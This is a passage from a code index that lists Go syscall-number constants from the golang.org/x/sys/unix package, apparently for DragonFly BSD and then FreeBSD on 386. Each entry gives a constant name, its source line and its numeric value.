constant SYS_FSYNC (line 82) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 83) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 84) | SYS_SOCKET = 97 constant SYS_CONNECT (line 85) | SYS_CONNECT = 98 constant SYS_GETPRIORITY (line 86) | SYS_GETPRIORITY = 100 constant SYS_BIND (line 87) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 88) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 89) | SYS_LISTEN = 106 constant SYS_GETTIMEOFDAY (line 90) | SYS_GETTIMEOFDAY = 116 constant SYS_GETRUSAGE (line 91) | SYS_GETRUSAGE = 117 constant SYS_GETSOCKOPT (line 92) | SYS_GETSOCKOPT = 118 constant SYS_READV (line 93) | SYS_READV = 120 constant SYS_WRITEV (line 94) | SYS_WRITEV = 121 constant SYS_SETTIMEOFDAY (line 95) | SYS_SETTIMEOFDAY = 122 constant SYS_FCHOWN (line 96) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 97) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 98) | SYS_SETREUID = 126 constant SYS_SETREGID (line 99) | SYS_SETREGID = 127 constant SYS_RENAME (line 100) | SYS_RENAME = 128 constant SYS_FLOCK (line 101) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 102) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 103) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 104) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 105) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 106) | SYS_MKDIR = 136 constant SYS_RMDIR (line 107) | SYS_RMDIR = 137 constant SYS_UTIMES (line 108) | SYS_UTIMES = 138 constant SYS_ADJTIME (line 109) | SYS_ADJTIME = 140 constant SYS_SETSID (line 110) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 111) | SYS_QUOTACTL = 148 constant SYS_STATFS (line 112) | SYS_STATFS = 157 constant SYS_FSTATFS (line 113) | SYS_FSTATFS = 158 constant SYS_GETFH (line 114) | SYS_GETFH = 161 constant SYS_SYSARCH (line 115) | SYS_SYSARCH = 165 constant SYS_RTPRIO (line 116) | SYS_RTPRIO = 166 constant SYS_EXTPREAD (line 117) | SYS_EXTPREAD = 173 constant SYS_EXTPWRITE (line 118) | SYS_EXTPWRITE = 174 constant SYS_NTP_ADJTIME (line 119) | SYS_NTP_ADJTIME = 176 constant SYS_SETGID (line 120) | SYS_SETGID = 181 constant SYS_SETEGID (line 121) | SYS_SETEGID = 182 constant SYS_SETEUID (line 122) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 123) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 124) | SYS_FPATHCONF = 192 constant SYS_GETRLIMIT (line 125) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 126) | SYS_SETRLIMIT = 195 constant SYS_MMAP (line 127) | SYS_MMAP = 197 constant SYS_LSEEK (line 128) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 129) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 130) | SYS_FTRUNCATE = 201 constant SYS___SYSCTL (line 131) | SYS___SYSCTL = 202 constant SYS_MLOCK (line 132) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 133) | SYS_MUNLOCK = 204 constant SYS_UNDELETE (line 134) | SYS_UNDELETE = 205 constant SYS_FUTIMES (line 135) | SYS_FUTIMES = 206 constant SYS_GETPGID (line 136) | SYS_GETPGID = 207 constant SYS_POLL (line 137) | SYS_POLL = 209 constant SYS___SEMCTL (line 138) | SYS___SEMCTL = 220 constant SYS_SEMGET (line 139) | SYS_SEMGET = 221 constant SYS_SEMOP (line 140) | SYS_SEMOP = 222 constant SYS_MSGCTL (line 141) | SYS_MSGCTL = 224 constant SYS_MSGGET (line 142) | SYS_MSGGET = 225 constant SYS_MSGSND (line 143) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 144) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 145) | SYS_SHMAT = 228 constant SYS_SHMCTL (line 146) | SYS_SHMCTL = 229 constant SYS_SHMDT (line 147) | SYS_SHMDT = 230 constant SYS_SHMGET (line 148) | SYS_SHMGET = 231 constant SYS_CLOCK_GETTIME (line 149) | SYS_CLOCK_GETTIME = 232 constant SYS_CLOCK_SETTIME (line 150) | SYS_CLOCK_SETTIME = 233 constant SYS_CLOCK_GETRES (line 151) | SYS_CLOCK_GETRES = 234 constant SYS_NANOSLEEP (line 152) | SYS_NANOSLEEP = 240 constant SYS_MINHERIT (line 153) | SYS_MINHERIT = 250 constant SYS_RFORK (line 154) | SYS_RFORK = 251 constant SYS_OPENBSD_POLL (line 155) | SYS_OPENBSD_POLL = 252 constant SYS_ISSETUGID (line 156) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 157) | SYS_LCHOWN = 254 constant SYS_LCHMOD (line 158) | SYS_LCHMOD = 274 constant SYS_LUTIMES (line 159) | SYS_LUTIMES = 276 constant SYS_EXTPREADV (line 160) | SYS_EXTPREADV = 289 constant SYS_EXTPWRITEV (line 161) | SYS_EXTPWRITEV = 290 constant SYS_FHSTATFS (line 162) | SYS_FHSTATFS = 297 constant SYS_FHOPEN (line 163) | SYS_FHOPEN = 298 constant SYS_MODNEXT (line 164) | SYS_MODNEXT = 300 constant SYS_MODSTAT (line 165) | SYS_MODSTAT = 301 constant SYS_MODFNEXT (line 166) | SYS_MODFNEXT = 302 constant SYS_MODFIND (line 167) | SYS_MODFIND = 303 constant SYS_KLDLOAD (line 168) | SYS_KLDLOAD = 304 constant SYS_KLDUNLOAD (line 169) | SYS_KLDUNLOAD = 305 constant SYS_KLDFIND (line 170) | SYS_KLDFIND = 306 constant SYS_KLDNEXT (line 171) | SYS_KLDNEXT = 307 constant SYS_KLDSTAT (line 172) | SYS_KLDSTAT = 308 constant SYS_KLDFIRSTMOD (line 173) | SYS_KLDFIRSTMOD = 309 constant SYS_GETSID (line 174) | SYS_GETSID = 310 constant SYS_SETRESUID (line 175) | SYS_SETRESUID = 311 constant SYS_SETRESGID (line 176) | SYS_SETRESGID = 312 constant SYS_AIO_RETURN (line 177) | SYS_AIO_RETURN = 314 constant SYS_AIO_SUSPEND (line 178) | SYS_AIO_SUSPEND = 315 constant SYS_AIO_CANCEL (line 179) | SYS_AIO_CANCEL = 316 constant SYS_AIO_ERROR (line 180) | SYS_AIO_ERROR = 317 constant SYS_AIO_READ (line 181) | SYS_AIO_READ = 318 constant SYS_AIO_WRITE (line 182) | SYS_AIO_WRITE = 319 constant SYS_LIO_LISTIO (line 183) | SYS_LIO_LISTIO = 320 constant SYS_YIELD (line 184) | SYS_YIELD = 321 constant SYS_MLOCKALL (line 185) | SYS_MLOCKALL = 324 constant SYS_MUNLOCKALL (line 186) | SYS_MUNLOCKALL = 325 constant SYS___GETCWD (line 187) | SYS___GETCWD = 326 constant SYS_SCHED_SETPARAM (line 188) | SYS_SCHED_SETPARAM = 327 constant SYS_SCHED_GETPARAM (line 189) | SYS_SCHED_GETPARAM = 328 constant SYS_SCHED_SETSCHEDULER (line 190) | SYS_SCHED_SETSCHEDULER = 329 constant SYS_SCHED_GETSCHEDULER (line 191) | SYS_SCHED_GETSCHEDULER = 330 constant SYS_SCHED_YIELD (line 192) | SYS_SCHED_YIELD = 331 constant SYS_SCHED_GET_PRIORITY_MAX (line 193) | SYS_SCHED_GET_PRIORITY_MAX = 332 constant SYS_SCHED_GET_PRIORITY_MIN (line 194) | SYS_SCHED_GET_PRIORITY_MIN = 333 constant SYS_SCHED_RR_GET_INTERVAL (line 195) | SYS_SCHED_RR_GET_INTERVAL = 334 constant SYS_UTRACE (line 196) | SYS_UTRACE = 335 constant SYS_KLDSYM (line 197) | SYS_KLDSYM = 337 constant SYS_JAIL (line 198) | SYS_JAIL = 338 constant SYS_SIGPROCMASK (line 199) | SYS_SIGPROCMASK = 340 constant SYS_SIGSUSPEND (line 200) | SYS_SIGSUSPEND = 341 constant SYS_SIGACTION (line 201) | SYS_SIGACTION = 342 constant SYS_SIGPENDING (line 202) | SYS_SIGPENDING = 343 constant SYS_SIGRETURN (line 203) | SYS_SIGRETURN = 344 constant SYS_SIGTIMEDWAIT (line 204) | SYS_SIGTIMEDWAIT = 345 constant SYS_SIGWAITINFO (line 205) | SYS_SIGWAITINFO = 346 constant SYS___ACL_GET_FILE (line 206) | SYS___ACL_GET_FILE = 347 constant SYS___ACL_SET_FILE (line 207) | SYS___ACL_SET_FILE = 348 constant SYS___ACL_GET_FD (line 208) | SYS___ACL_GET_FD = 349 constant SYS___ACL_SET_FD (line 209) | SYS___ACL_SET_FD = 350 constant SYS___ACL_DELETE_FILE (line 210) | SYS___ACL_DELETE_FILE = 351 constant SYS___ACL_DELETE_FD (line 211) | SYS___ACL_DELETE_FD = 352 constant SYS___ACL_ACLCHECK_FILE (line 212) | SYS___ACL_ACLCHECK_FILE = 353 constant SYS___ACL_ACLCHECK_FD (line 213) | SYS___ACL_ACLCHECK_FD = 354 constant SYS_EXTATTRCTL (line 214) | SYS_EXTATTRCTL = 355 constant SYS_EXTATTR_SET_FILE (line 215) | SYS_EXTATTR_SET_FILE = 356 constant SYS_EXTATTR_GET_FILE (line 216) | SYS_EXTATTR_GET_FILE = 357 constant SYS_EXTATTR_DELETE_FILE (line 217) | SYS_EXTATTR_DELETE_FILE = 358 constant SYS_AIO_WAITCOMPLETE (line 218) | SYS_AIO_WAITCOMPLETE = 359 constant SYS_GETRESUID (line 219) | SYS_GETRESUID = 360 constant SYS_GETRESGID (line 220) | SYS_GETRESGID = 361 constant SYS_KQUEUE (line 221) | SYS_KQUEUE = 362 constant SYS_KEVENT (line 222) | SYS_KEVENT = 363 constant SYS_KENV (line 223) | SYS_KENV = 390 constant SYS_LCHFLAGS (line 224) | SYS_LCHFLAGS = 391 constant SYS_UUIDGEN (line 225) | SYS_UUIDGEN = 392 constant SYS_SENDFILE (line 226) | SYS_SENDFILE = 393 constant SYS_VARSYM_SET (line 227) | SYS_VARSYM_SET = 450 constant SYS_VARSYM_GET (line 228) | SYS_VARSYM_GET = 451 constant SYS_VARSYM_LIST (line 229) | SYS_VARSYM_LIST = 452 constant SYS_EXEC_SYS_REGISTER (line 230) | SYS_EXEC_SYS_REGISTER = 465 constant SYS_EXEC_SYS_UNREGISTER (line 231) | SYS_EXEC_SYS_UNREGISTER = 466 constant SYS_SYS_CHECKPOINT (line 232) | SYS_SYS_CHECKPOINT = 467 constant SYS_MOUNTCTL (line 233) | SYS_MOUNTCTL = 468 constant SYS_UMTX_SLEEP (line 234) | SYS_UMTX_SLEEP = 469 constant SYS_UMTX_WAKEUP (line 235) | SYS_UMTX_WAKEUP = 470 constant SYS_JAIL_ATTACH (line 236) | SYS_JAIL_ATTACH = 471 constant SYS_SET_TLS_AREA (line 237) | SYS_SET_TLS_AREA = 472 constant SYS_GET_TLS_AREA (line 238) | SYS_GET_TLS_AREA = 473 constant SYS_CLOSEFROM (line 239) | SYS_CLOSEFROM = 474 constant SYS_STAT (line 240) | SYS_STAT = 475 constant SYS_FSTAT (line 241) | SYS_FSTAT = 476 constant SYS_LSTAT (line 242) | SYS_LSTAT = 477 constant SYS_FHSTAT (line 243) | SYS_FHSTAT = 478 constant SYS_GETDIRENTRIES (line 244) | SYS_GETDIRENTRIES = 479 constant SYS_GETDENTS (line 245) | SYS_GETDENTS = 480 constant SYS_USCHED_SET (line 246) | SYS_USCHED_SET = 481 constant SYS_EXTACCEPT (line 247) | SYS_EXTACCEPT = 482 constant SYS_EXTCONNECT (line 248) | SYS_EXTCONNECT = 483 constant SYS_MCONTROL (line 249) | SYS_MCONTROL = 485 constant SYS_VMSPACE_CREATE (line 250) | SYS_VMSPACE_CREATE = 486 constant SYS_VMSPACE_DESTROY (line 251) | SYS_VMSPACE_DESTROY = 487 constant SYS_VMSPACE_CTL (line 252) | SYS_VMSPACE_CTL = 488 constant SYS_VMSPACE_MMAP (line 253) | SYS_VMSPACE_MMAP = 489 constant SYS_VMSPACE_MUNMAP (line 254) | SYS_VMSPACE_MUNMAP = 490 constant SYS_VMSPACE_MCONTROL (line 255) | SYS_VMSPACE_MCONTROL = 491 constant SYS_VMSPACE_PREAD (line 256) | SYS_VMSPACE_PREAD = 492 constant SYS_VMSPACE_PWRITE (line 257) | SYS_VMSPACE_PWRITE = 493 constant SYS_EXTEXIT (line 258) | SYS_EXTEXIT = 494 constant SYS_LWP_CREATE (line 259) | SYS_LWP_CREATE = 495 constant SYS_LWP_GETTID (line 260) | SYS_LWP_GETTID = 496 constant SYS_LWP_KILL (line 261) | SYS_LWP_KILL = 497 constant SYS_LWP_RTPRIO (line 262) | SYS_LWP_RTPRIO = 498 constant SYS_PSELECT (line 263) | SYS_PSELECT = 499 constant SYS_STATVFS (line 264) | SYS_STATVFS = 500 constant SYS_FSTATVFS (line 265) | SYS_FSTATVFS = 501 constant SYS_FHSTATVFS (line 266) | SYS_FHSTATVFS = 502 constant SYS_GETVFSSTAT (line 267) | SYS_GETVFSSTAT = 503 constant SYS_OPENAT (line 268) | SYS_OPENAT = 504 constant SYS_FSTATAT (line 269) | SYS_FSTATAT = 505 constant SYS_FCHMODAT (line 270) | SYS_FCHMODAT = 506 constant SYS_FCHOWNAT (line 271) | SYS_FCHOWNAT = 507 constant SYS_UNLINKAT (line 272) | SYS_UNLINKAT = 508 constant SYS_FACCESSAT (line 273) | SYS_FACCESSAT = 509 constant SYS_MQ_OPEN (line 274) | SYS_MQ_OPEN = 510 constant SYS_MQ_CLOSE (line 275) | SYS_MQ_CLOSE = 511 constant SYS_MQ_UNLINK (line 276) | SYS_MQ_UNLINK = 512 constant SYS_MQ_GETATTR (line 277) | SYS_MQ_GETATTR = 513 constant SYS_MQ_SETATTR (line 278) | SYS_MQ_SETATTR = 514 constant SYS_MQ_NOTIFY (line 279) | SYS_MQ_NOTIFY = 515 constant SYS_MQ_SEND (line 280) | SYS_MQ_SEND = 516 constant SYS_MQ_RECEIVE (line 281) | SYS_MQ_RECEIVE = 517 constant SYS_MQ_TIMEDSEND (line 282) | SYS_MQ_TIMEDSEND = 518 constant SYS_MQ_TIMEDRECEIVE (line 283) | SYS_MQ_TIMEDRECEIVE = 519 constant SYS_IOPRIO_SET (line 284) | SYS_IOPRIO_SET = 520 constant SYS_IOPRIO_GET (line 285) | SYS_IOPRIO_GET = 521 constant SYS_CHROOT_KERNEL (line 286) | SYS_CHROOT_KERNEL = 522 constant SYS_RENAMEAT (line 287) | SYS_RENAMEAT = 523 constant SYS_MKDIRAT (line 288) | SYS_MKDIRAT = 524 constant SYS_MKFIFOAT (line 289) | SYS_MKFIFOAT = 525 constant SYS_MKNODAT (line 290) | SYS_MKNODAT = 526 constant SYS_READLINKAT (line 291) | SYS_READLINKAT = 527 constant SYS_SYMLINKAT (line 292) | SYS_SYMLINKAT = 528 constant SYS_SWAPOFF (line 293) | SYS_SWAPOFF = 529 constant SYS_VQUOTACTL (line 294) | SYS_VQUOTACTL = 530 constant SYS_LINKAT (line 295) | SYS_LINKAT = 531 constant SYS_EACCESS (line 296) | SYS_EACCESS = 532 constant SYS_LPATHCONF (line 297) | SYS_LPATHCONF = 533 constant SYS_VMM_GUEST_CTL (line 298) | SYS_VMM_GUEST_CTL = 534 constant SYS_VMM_GUEST_SYNC_ADDR (line 299) | SYS_VMM_GUEST_SYNC_ADDR = 535 constant SYS_PROCCTL (line 300) | SYS_PROCCTL = 536 constant SYS_CHFLAGSAT (line 301) | SYS_CHFLAGSAT = 537 constant SYS_PIPE2 (line 302) | SYS_PIPE2 = 538 constant SYS_UTIMENSAT (line 303) | SYS_UTIMENSAT = 539 constant SYS_FUTIMENS (line 304) | SYS_FUTIMENS = 540 constant SYS_ACCEPT4 (line 305) | SYS_ACCEPT4 = 541 constant SYS_LWP_SETNAME (line 306) | SYS_LWP_SETNAME = 542 constant SYS_PPOLL (line 307) | SYS_PPOLL = 543 constant SYS_LWP_SETAFFINITY (line 308) | SYS_LWP_SETAFFINITY = 544 constant SYS_LWP_GETAFFINITY (line 309) | SYS_LWP_GETAFFINITY = 545 constant SYS_LWP_CREATE2 (line 310) | SYS_LWP_CREATE2 = 546 constant SYS_GETCPUCLOCKID (line 311) | SYS_GETCPUCLOCKID = 547 constant SYS_WAIT6 (line 312) | SYS_WAIT6 = 548 constant SYS_LWP_GETNAME (line 313) | SYS_LWP_GETNAME = 549 constant SYS_GETRANDOM (line 314) | SYS_GETRANDOM = 550 constant SYS___REALPATH (line 315) | SYS___REALPATH = 551 FILE: vendor/golang.org/x/sys/unix/zsysnum_freebsd_386.go constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_WAIT4 (line 16) | SYS_WAIT4 = 7 constant SYS_LINK (line 17) | SYS_LINK = 9 constant SYS_UNLINK (line 18) | SYS_UNLINK = 10 constant SYS_CHDIR (line 19) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 20) | SYS_FCHDIR = 13 constant SYS_CHMOD (line 21) | SYS_CHMOD = 15 constant SYS_CHOWN (line 22) | SYS_CHOWN = 16 constant SYS_BREAK (line 23) | SYS_BREAK = 17 constant SYS_GETPID (line 24) | SYS_GETPID = 20 constant SYS_MOUNT (line 25) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 26) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 27) | SYS_SETUID = 23 constant SYS_GETUID (line 28) | SYS_GETUID = 24 constant SYS_GETEUID (line 29) | SYS_GETEUID = 25 constant SYS_PTRACE (line 30) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 31) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 32) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 33) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 34) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 35) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 36) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 37) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 38) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 39) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 40) | SYS_SYNC = 36 constant SYS_KILL (line 41) | SYS_KILL = 37 constant SYS_GETPPID (line 42) | SYS_GETPPID = 39 constant SYS_DUP (line 43) | SYS_DUP = 41 constant SYS_GETEGID (line 44) | SYS_GETEGID = 43 constant SYS_PROFIL (line 45) | SYS_PROFIL = 44 constant SYS_KTRACE (line 46) | SYS_KTRACE = 45 constant SYS_GETGID (line 47) | SYS_GETGID = 47 constant SYS_GETLOGIN (line 48) | SYS_GETLOGIN = 49 constant SYS_SETLOGIN (line 49) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 50) | SYS_ACCT = 51 constant SYS_SIGALTSTACK (line 51) | SYS_SIGALTSTACK = 53 constant SYS_IOCTL (line 52) | SYS_IOCTL = 54 constant SYS_REBOOT (line 53) | SYS_REBOOT = 55 constant SYS_REVOKE (line 54) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 55) | SYS_SYMLINK = 57 constant SYS_READLINK (line 56) | SYS_READLINK = 58 constant SYS_EXECVE (line 57) | SYS_EXECVE = 59 constant SYS_UMASK (line 58) | SYS_UMASK = 60 constant SYS_CHROOT (line 59) | SYS_CHROOT = 61 constant SYS_MSYNC (line 60) | SYS_MSYNC = 65 constant SYS_VFORK (line 61) | SYS_VFORK = 66 constant SYS_SBRK (line 62) | SYS_SBRK = 69 constant SYS_SSTK (line 63) | SYS_SSTK = 70 constant SYS_MUNMAP (line 64) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 65) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 66) | SYS_MADVISE = 75 constant SYS_MINCORE (line 67) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 68) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 69) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 70) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 71) | SYS_SETPGID = 82 constant SYS_SETITIMER (line 72) | SYS_SETITIMER = 83 constant SYS_SWAPON (line 73) | SYS_SWAPON = 85 constant SYS_GETITIMER (line 74) | SYS_GETITIMER = 86 constant SYS_GETDTABLESIZE (line 75) | SYS_GETDTABLESIZE = 89 constant SYS_DUP2 (line 76) | SYS_DUP2 = 90 constant SYS_FCNTL (line 77) | SYS_FCNTL = 92 constant SYS_SELECT (line 78) | SYS_SELECT = 93 constant SYS_FSYNC (line 79) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 80) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 81) | SYS_SOCKET = 97 constant SYS_CONNECT (line 82) | SYS_CONNECT = 98 constant SYS_GETPRIORITY (line 83) | SYS_GETPRIORITY = 100 constant SYS_BIND (line 84) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 85) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 86) | SYS_LISTEN = 106 constant SYS_GETTIMEOFDAY (line 87) | SYS_GETTIMEOFDAY = 116 constant SYS_GETRUSAGE (line 88) | SYS_GETRUSAGE = 117 constant SYS_GETSOCKOPT (line 89) | SYS_GETSOCKOPT = 118 constant SYS_READV (line 90) | SYS_READV = 120 constant SYS_WRITEV (line 91) | SYS_WRITEV = 121 constant SYS_SETTIMEOFDAY (line 92) | SYS_SETTIMEOFDAY = 122 constant SYS_FCHOWN (line 93) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 94) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 95) | SYS_SETREUID = 126 constant SYS_SETREGID (line 96) | SYS_SETREGID = 127 constant SYS_RENAME (line 97) | SYS_RENAME = 128 constant SYS_FLOCK (line 98) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 99) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 100) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 101) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 102) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 103) | SYS_MKDIR = 136 constant SYS_RMDIR (line 104) | SYS_RMDIR = 137 constant SYS_UTIMES (line 105) | SYS_UTIMES = 138 constant SYS_ADJTIME (line 106) | SYS_ADJTIME = 140 constant SYS_SETSID (line 107) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 108) | SYS_QUOTACTL = 148 constant SYS_NLM_SYSCALL (line 109) | SYS_NLM_SYSCALL = 154 constant SYS_NFSSVC (line 110) | SYS_NFSSVC = 155 constant SYS_LGETFH (line 111) | SYS_LGETFH = 160 constant SYS_GETFH (line 112) | SYS_GETFH = 161 constant SYS_SYSARCH (line 113) | SYS_SYSARCH = 165 constant SYS_RTPRIO (line 114) | SYS_RTPRIO = 166 constant SYS_SEMSYS (line 115) | SYS_SEMSYS = 169 constant SYS_MSGSYS (line 116) | SYS_MSGSYS = 170 constant SYS_SHMSYS (line 117) | SYS_SHMSYS = 171 constant SYS_SETFIB (line 118) | SYS_SETFIB = 175 constant SYS_NTP_ADJTIME (line 119) | SYS_NTP_ADJTIME = 176 constant SYS_SETGID (line 120) | SYS_SETGID = 181 constant SYS_SETEGID (line 121) | SYS_SETEGID = 182 constant SYS_SETEUID (line 122) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 123) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 124) | SYS_FPATHCONF = 192 constant SYS_GETRLIMIT (line 125) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 126) | SYS_SETRLIMIT = 195 constant SYS___SYSCTL (line 127) | SYS___SYSCTL = 202 constant SYS_MLOCK (line 128) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 129) | SYS_MUNLOCK = 204 constant SYS_UNDELETE (line 130) | SYS_UNDELETE = 205 constant SYS_FUTIMES (line 131) | SYS_FUTIMES = 206 constant SYS_GETPGID (line 132) | SYS_GETPGID = 207 constant SYS_POLL (line 133) | SYS_POLL = 209 constant SYS_SEMGET (line 134) | SYS_SEMGET = 221 constant SYS_SEMOP (line 135) | SYS_SEMOP = 222 constant SYS_MSGGET (line 136) | SYS_MSGGET = 225 constant SYS_MSGSND (line 137) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 138) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 139) | SYS_SHMAT = 228 constant SYS_SHMDT (line 140) | SYS_SHMDT = 230 constant SYS_SHMGET (line 141) | SYS_SHMGET = 231 constant SYS_CLOCK_GETTIME (line 142) | SYS_CLOCK_GETTIME = 232 constant SYS_CLOCK_SETTIME (line 143) | SYS_CLOCK_SETTIME = 233 constant SYS_CLOCK_GETRES (line 144) | SYS_CLOCK_GETRES = 234 constant SYS_KTIMER_CREATE (line 145) | SYS_KTIMER_CREATE = 235 constant SYS_KTIMER_DELETE (line 146) | SYS_KTIMER_DELETE = 236 constant SYS_KTIMER_SETTIME (line 147) | SYS_KTIMER_SETTIME = 237 constant SYS_KTIMER_GETTIME (line 148) | SYS_KTIMER_GETTIME = 238 constant SYS_KTIMER_GETOVERRUN (line 149) | SYS_KTIMER_GETOVERRUN = 239 constant SYS_NANOSLEEP (line 150) | SYS_NANOSLEEP = 240 constant SYS_FFCLOCK_GETCOUNTER (line 151) | SYS_FFCLOCK_GETCOUNTER = 241 constant SYS_FFCLOCK_SETESTIMATE (line 152) | SYS_FFCLOCK_SETESTIMATE = 242 constant SYS_FFCLOCK_GETESTIMATE (line 153) | SYS_FFCLOCK_GETESTIMATE = 243 constant SYS_CLOCK_NANOSLEEP (line 154) | SYS_CLOCK_NANOSLEEP = 244 constant SYS_CLOCK_GETCPUCLOCKID2 (line 155) | SYS_CLOCK_GETCPUCLOCKID2 = 247 constant SYS_NTP_GETTIME (line 156) | SYS_NTP_GETTIME = 248 constant SYS_MINHERIT (line 157) | SYS_MINHERIT = 250 constant SYS_RFORK (line 158) | SYS_RFORK = 251 constant SYS_ISSETUGID (line 159) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 160) | SYS_LCHOWN = 254 constant SYS_AIO_READ (line 161) | SYS_AIO_READ = 255 constant SYS_AIO_WRITE (line 162) | SYS_AIO_WRITE = 256 constant SYS_LIO_LISTIO (line 163) | SYS_LIO_LISTIO = 257 constant SYS_LCHMOD (line 164) | SYS_LCHMOD = 274 constant SYS_LUTIMES (line 165) | SYS_LUTIMES = 276 constant SYS_PREADV (line 166) | SYS_PREADV = 289 constant SYS_PWRITEV (line 167) | SYS_PWRITEV = 290 constant SYS_FHOPEN (line 168) | SYS_FHOPEN = 298 constant SYS_MODNEXT (line 169) | SYS_MODNEXT = 300 constant SYS_MODSTAT (line 170) | SYS_MODSTAT = 301 constant SYS_MODFNEXT (line 171) | SYS_MODFNEXT = 302 constant SYS_MODFIND (line 172) | SYS_MODFIND = 303 constant SYS_KLDLOAD (line 173) | SYS_KLDLOAD = 304 constant SYS_KLDUNLOAD (line 174) | SYS_KLDUNLOAD = 305 constant SYS_KLDFIND (line 175) | SYS_KLDFIND = 306 constant SYS_KLDNEXT (line 176) | SYS_KLDNEXT = 307 constant SYS_KLDSTAT (line 177) | SYS_KLDSTAT = 308 constant SYS_KLDFIRSTMOD (line 178) | SYS_KLDFIRSTMOD = 309 constant SYS_GETSID (line 179) | SYS_GETSID = 310 constant SYS_SETRESUID (line 180) | SYS_SETRESUID = 311 constant SYS_SETRESGID (line 181) | SYS_SETRESGID = 312 constant SYS_AIO_RETURN (line 182) | SYS_AIO_RETURN = 314 constant SYS_AIO_SUSPEND (line 183) | SYS_AIO_SUSPEND = 315 constant SYS_AIO_CANCEL (line 184) | SYS_AIO_CANCEL = 316 constant SYS_AIO_ERROR (line 185) | SYS_AIO_ERROR = 317 constant SYS_YIELD (line 186) | SYS_YIELD = 321 constant SYS_MLOCKALL (line 187) | SYS_MLOCKALL = 324 constant SYS_MUNLOCKALL (line 188) | SYS_MUNLOCKALL = 325 constant SYS___GETCWD (line 189) | SYS___GETCWD = 326 constant SYS_SCHED_SETPARAM (line 190) | SYS_SCHED_SETPARAM = 327 constant SYS_SCHED_GETPARAM (line 191) | SYS_SCHED_GETPARAM = 328 constant SYS_SCHED_SETSCHEDULER (line 192) | SYS_SCHED_SETSCHEDULER = 329 constant SYS_SCHED_GETSCHEDULER (line 193) | SYS_SCHED_GETSCHEDULER = 330 constant SYS_SCHED_YIELD (line 194) | SYS_SCHED_YIELD = 331 constant SYS_SCHED_GET_PRIORITY_MAX (line 195) | SYS_SCHED_GET_PRIORITY_MAX = 332 constant SYS_SCHED_GET_PRIORITY_MIN (line 196) | SYS_SCHED_GET_PRIORITY_MIN = 333 constant SYS_SCHED_RR_GET_INTERVAL (line 197) | SYS_SCHED_RR_GET_INTERVAL = 334 constant SYS_UTRACE (line 198) | SYS_UTRACE = 335 constant SYS_KLDSYM (line 199) | SYS_KLDSYM = 337 constant SYS_JAIL (line 200) | SYS_JAIL = 338 constant SYS_SIGPROCMASK (line 201) | SYS_SIGPROCMASK = 340 constant SYS_SIGSUSPEND (line 202) | SYS_SIGSUSPEND = 341 constant SYS_SIGPENDING (line 203) | SYS_SIGPENDING = 343 constant SYS_SIGTIMEDWAIT (line 204) | SYS_SIGTIMEDWAIT = 345 constant SYS_SIGWAITINFO (line 205) | SYS_SIGWAITINFO = 346 constant SYS___ACL_GET_FILE (line 206) | SYS___ACL_GET_FILE = 347 constant 